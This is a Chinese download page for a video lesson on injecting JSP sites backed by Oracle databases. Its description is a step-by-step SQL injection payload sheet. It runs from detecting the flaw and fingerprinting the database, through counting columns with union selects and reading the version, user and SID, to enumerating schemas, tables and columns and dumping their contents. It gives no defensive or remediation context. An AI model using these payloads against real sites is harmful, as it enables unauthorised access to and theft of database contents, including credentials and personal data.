您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第九课:jsp+oracle注入实战教程
实战渗透测试第九课:jsp+oracle注入实战教程
软件大小:18.6 MB
更新时间:2016-11-01 01:34
授权方式:共享版
人气访问:157次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第九课:jsp+oracle注入实战教程介绍

讲师:巅峰邪恶

动画名称:渗透测试第九课   jsp+oracle注入


1.判断是否存在注入


   单引号


   and 1=1


   and 1=2


2.判数据库


  /* 返回正常证明是mysql数据库


  --返回正常证明是oracle或者mssql数据库


  ;返回错误证明是oracle数据库


  and exists(select * from dual) 返回正常为oracle数据库 dual是oracl库中默认的表


  and (select count(*) from user_tables)>0 返回正常为oracle数据库 user_tables是oracl库中默认的表



3.查看数据库信息


  让网页报错  如在参数后面加'  http://www.xxx.com/news.jsp=22'


4.判断字段数


union select null from dual


dual是oracle数据库默认存在的一个表,权限较低,null是默认的类型,


提交几个null页面返回正常的时候就正明有几个字段


或者提交ordery by n



5.读取数据库信息


and 1=2 union select null,null,(select banner from sys.v_$version where rownum=1) from dual  可以得到数据库版本


6.获取当前数据库用户名


and  1=2  union select null,null,(select SYS_CONTEXT ('USERENV','CURRENT_USER') from dual) from dual


union select null,null,null,null,user,null from user_tables


7.通过查询日志文件绝对路径,判断操作系统


and 1=2 union select null,null,(select member from v$logfile where rownum=1) from dual


8.获取服务器sid


and 1=2 union select null,null,(select instance_name from v$instance) from dual



9.暴库名


and 1=2 union select null,null,(select owner from all_tables where rownum=1) from dual

暴出第一个库名


and 1=2 union select null,null,(select owner from all_tables where rownum=1 and owner<> '第一个库名') from dual


可以查出当前用户数据库中的所有数据库库名


10,获取表名


and 1=2 union select null,null,(select table_name from user_tables where rownum=1) from dual

暴出一个表名


and 1=2 union select null,null,(select table_name from user_tables where rownum=1 and table_name<>'第一个表名') from dual


11.获取字段名


and 1=2 union select null,null,(select column_name from user_tab_columns where table_name='表名' and rownum=1) from dual


可获取第一个字段


and  1=2  union  select  null,null,(select  column_name  from  user_tab_columns  where 

table_name='表名' and column_name<>'第一个字段' and rownum=1) from dual


获取全部字段


12.获取字段内容


and 1=2 union select null,null,字段名 from 表名

实战渗透测试第九课:jsp+oracle注入实战教程下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号